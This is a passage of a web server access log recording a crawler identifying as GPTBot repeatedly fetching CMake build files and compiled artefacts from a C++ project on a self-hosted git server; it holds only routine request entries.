"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21677] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21676] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15363] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15361] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15363] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17038] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12947] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10810] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13712] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13713] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13649] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14152] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12882] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 